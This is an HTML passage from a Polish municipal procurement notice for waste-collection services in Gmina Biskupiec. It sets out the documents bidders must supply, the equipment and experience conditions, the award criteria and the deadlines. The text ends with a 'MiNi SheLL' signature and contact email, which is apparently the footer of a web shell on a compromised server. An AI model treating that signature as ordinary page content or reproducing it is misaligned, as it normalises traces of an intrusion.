<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.3.2)</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 10 -11 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert.</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY, USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane roboty budowlane, dostawy lub usługi odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;"><p style="margin: 0px; padding: 0px;">inne dokumenty</p>
<p style="margin: 0px; padding: 0px;">W celu wykazania spełnienia przez wykonawcę warunków określonych w rozdziale VI SIWZ pkt. 1.1. - 1.4.  zamawiający żąda złożenia do oferty następujących dokumentów i  oświadczeń:
Dla potwierdzenia spełnienia warunku posiadania uprawnień do wykonywania określonej działalności lub czynności określonym w rozdziale VI SIWZ pkt. 1.1., Wykonawca zobowiązany jest  przedłożyć w ofercie:
wpis do Rejestru Działalności Regulowanej prowadzonego przez Wójta Gminy Biskupiec - wykonawca nie ma obowiązku złożenia ponieważ Rejestr jest w zasobach zamawiającego;
Dla potwierdzenia spełnienia warunku posiadania wiedzy i doświadczenia określonym w rozdziale VI SIWZ pkt. 1.2., Wykonawca zobowiązany  jest przedłożyć w ofercie:
Wykaz zrealizowanych lub realizowanych głównych usług w ciągu ostatnich trzech lat  przed upływem terminu składania ofert , a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie - wg wzoru załącznika nr 2 SIWZ  Doświadczenie Zawodowe  - wraz z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, na rzecz  których usługi zostały wykonane lub wykonywane wraz z załączeniem dowodów najważniejszych usług, czy zostały one wykonane lub są wykonywane należycie. Dowody mogą stanowić: poświadczenia, oświadczenia dołączone do oferty
Uwaga:  W przypadku gdy zamawiający -  Gmina Biskupiec jest podmiotem , na rzecz którego usługi  odbioru odpadów komunalnych zostały wcześniej wykonane, Wykonawca nie ma obowiązku przekładania dowodów , o których mowa powyżej.

Jeżeli Wykonawca polega na wiedzy i doświadczeniu innych podmiotów należy przedłożyć w oryginale pisemne zobowiązanie tych podmiotów do oddania Wykonawcy do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia.

Dla potwierdzenia spełnienia warunku dysponowania odpowiednim potencjałem technicznym oraz osobami zdolnymi do wykonania zamówienia określonym w rozdziale VI SIWZ pkt. 1.3. Wykonawca zobowiązany  jest przedłożyć w ofercie:
wykaz narzędzi, wyposażenia wykonawcy, urządzeń technicznych oraz pojazdów dostępnych wykonawcy usług w celu wykonania zamówienia oraz o podstawie do dysponowania tymi zasobami -wg wzoru załącznika nr 3 SIWZ   Potencjał Techniczny  Ponadto wykonawca musi udokumentować, że  na czas składania ofert pojazdy przeznaczone do realizacji tego zamówienia wyposażone są w system:
a) monitoringu bazującego na systemie pozycjonowania satelitarnego, umożliwiający trwałe zapisywanie, przechowywanie i odczytywanie danych o położeniu pojazdu i miejscach postojów oraz
b) czujników zapisujących dane o miejscach wyładunku odpadów
- umożliwiający weryfikację danych. Dla potwierdzenia spełnienia tego warunku wykonawca przedstawi umowę właściwą lub przedwstępną na świadczenie usługi monitoringu podpisaną nie później niż w dniu składania ofert.
oświadczenie , że osoby, które będą uczestniczyć w wykonywaniu zamówienia , posiadają wymagane uprawnienia , jeżeli ustawy nakładają obowiązek posiadania takich uprawnień - wg wzoru załącznika nr 5 SIWZ;
Jeżeli Wykonawca polega na potencjale technicznym, osobach zdolnych do wykonania zamówienia innych podmiotów zobowiązany jest przedłożyć w ofercie  pisemne zobowiązanie tych podmiotów do oddania Wykonawcy do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia. Oddany do dyspozycji przez inny podmiot  potencjał techniczny musi spełniać wymogi określone niniejszą SIWZ.

Dla potwierdzenia spełnienia warunku sytuacji ekonomicznej i finansowej określonym w rozdziale VI SIWZ pkt. 1.4. Wykonawca zobowiązany  jest przedłożyć w ofercie:
opłaconą polisę , a w przypadku jej braku innego dokumentu potwierdzającego , że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia

oświadczenia o spełnianiu warunków określonych w art.22.ust.1 ustawy-Prawo zamówień publicznych - wg załącznika nr 6 SIWZ   Oświadczenie - art.22 ust.1</p></li>



</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>formularz ofertowy</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zmiana umowy

Zamawiający dopuszcza możliwość dokonania istotnych zmian postanowień umowy w stosunku do treści oferty, na podstawie której dokonano wyboru Wykonawcy w następujących przypadkach:
 1)Wynagrodzenia w przypadku ustawowej zmiany stawki podatku od towarów i usług;
2) zmiany nazwy, siedziby lub innych danych Wykonawcy;
3) zmiany zabezpieczenia należytego wykonania umowy na wniosek Wykonawcy;
4)zmiany podwykonawców, pod warunkiem ich zaakceptowania przez Zamawiającego;
5)zmiany w zakresie sposobu realizacji umowy w przypadku zmiany przepisów prawa wpływających na sposób realizacji umowy , w tym zmiany przepisów prawa miejscowego ( np.regulaminu utrzymania czystości i porządku w gminie).
2. Zmiany w umowie mogą zostać dokonane wyłącznie w formie pisemnej pod rygorem nieważności.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.biskupiec.biuletyn.net<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy Biskupiec ul. Rynek 1 13-340 Biskupiec.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 25.07.2014 godzina 09:00, miejsce: Urząd Gminy Biskupiec ul. Rynek 1 13-340 Biskupiec pokój nr 11.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com